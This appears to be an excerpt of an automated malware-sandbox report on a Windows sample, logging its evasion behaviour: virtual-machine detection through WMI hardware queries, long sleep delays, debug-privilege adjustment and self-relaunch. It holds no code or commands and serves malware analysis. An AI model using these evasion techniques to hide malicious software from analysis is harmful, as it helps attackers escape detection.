Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Memory allocated: 1720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Memory allocated: 2F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Memory allocated: 2E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Memory allocated: 7D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Memory allocated: 8D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Memory allocated: 8FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Memory allocated: 9FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Memory allocated: 1760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Memory allocated: 30E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Memory allocated: 2F50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599778	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598423	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597722	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594595	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594250	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Window / User API: threadDelayed 8291			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Window / User API: threadDelayed 1539			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 5880	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -599778s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -598423s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -597722s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -596563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -596438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -594595s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784	Thread sleep time: -594250s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599778	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598423	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597722	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594595	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Thread delayed: delay time: 594250	Jump to behavior

Source: LisectAVT_2403002A_127.exe	Binary or memory string: qEMut
Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4573204072.0000000001342000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Process created: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
